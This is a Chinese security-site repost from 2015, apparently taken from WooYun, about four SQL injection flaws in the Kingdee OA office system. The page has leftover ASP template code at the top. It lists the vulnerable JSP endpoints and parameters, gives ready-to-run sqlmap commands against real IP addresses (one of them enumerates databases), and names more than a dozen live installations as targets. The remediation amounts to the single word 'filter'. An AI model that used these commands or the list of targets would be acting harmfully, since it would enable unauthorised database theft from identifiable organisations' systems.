<% dim ModuleName,InfoID,ChannelShortName,CorrelativeArticle,InstallDir,ChannelDir,Keyword,PageTitle,ArticleIntro,Articlecontent Keyword=stripHTML("金蝶,OA,办公,系统,四个,高危,SQL,注入,漏洞") PageTitle=stripHTML("金蝶OA办公系统四个高危SQL注入漏洞") ArticleIntro=stripHTML("出现sql注入,就得修复。") Articlecontent=stripHTML("  以下文件存在漏洞 /kingdee/control/netcom_out_del.jsp?del_id=1,1* del_id参数  /kingdee/co…") ModuleName = stripHTML("exploits") InfoID = stripHTML("215640") ChannelShortName=stripHTML("漏洞") InstallDir=stripHTML("http://www.77169.com/") ChannelDir=stripHTML("exploits") %> 金蝶OA办公系统四个高危SQL注入漏洞 - 华盟网 - http://www.77169.com
您现在的位置: 华盟网 >> 漏洞 >> 最新漏洞 >> 其它漏洞 >> 正文

[组图]金蝶OA办公系统四个高危SQL注入漏洞

2015/10/29 作者:乌云 来源: 网络收集
导读 <% if len(ArticleIntro)<3 then Response.Write Articlecontent 'Response.Write "Articlecontent" else Response.Write ArticleIntro 'Response.Write "ArticleIntro" end if %>

  以下文件存在漏洞

 /kingdee/control/netcom_out_del.jsp?del_id=1,1* del_id参数

 /kingdee/control/netcom_out_rfile_lower_submit.jsp?index_id=1&action=1 index_id参数

 /kingdee/control/netcom_out_rfile_submit.jsp?netcom_id=1&index_id=1 netcom_id参数

 /kingdee/control/netcom_out_submit.jsp?netcom_key=1&index_id=1  netcom_key、index_id参数

  0x01 sql注入1

  sqlmap.py -u http://221.226.149.17:8080/kingdee/control/netcom_out_del.jsp?del_id=1,1*

      

  0x02 sql注入2

  sqlmap.py -u http://222.133.44.10:8080/kingdee/control/netcom_out_rfile_submit.jsp?netcom_id=1&index_id=1

       

  0x03 sql注入3

  sqlmap.py -u http://222.133.44.10:8080/kingdee/control/netcom_out_submit.jsp?netcom_key=1&index_id=1


      

  0x04 sql注入4

  sqlmap.py -u http://221.226.149.17:8080/kingdee/control/netcom_out_rfile_lower_submit.jsp?index_id=1&action=1111

     

sqlmap.py -u "http://222.133.44.10:8080/kingdee/control/netcom_out_submit.jsp?netcom_key=1&index_id=1" --dbs

  给出几个案例:

  http://221.226.149.17:8080/kingdee/login/loginpage.jsp

  http://122.139.60.103:800/kingdee/login/loginpage.jsp

  http://oa.guanhao.com:8080/kingdee/login/loginpage.jsp

  http://222.179.238.182:8082/kingdee/login/loginpage2.jsp

  http://222.134.77.23:8080/kingdee/login/loginpage.jsp

  http://221.4.245.218:8080/kingdee/login/loginpage.jsp

  http://221.226.149.17:8080/kingdee/login/loginpage.jsp

  http://220.189.244.202:8080/kingdee/login/loginpage.jsp

  http://222.133.44.10:8080/kingdee/login/loginpage.jsp

  http://223.95.183.6:8080/kingdee/login/loginpage.jsp

  http://61.190.20.51/kingdee/login/loginpage.jsp

  http://60.194.110.187/kingdee/login/loginpage.jsp

  http://oa.roen.cn/kingdee/login/loginpage.jsp

  直接用SQLMAP即可跑出数据

         

   修复方案:

   过滤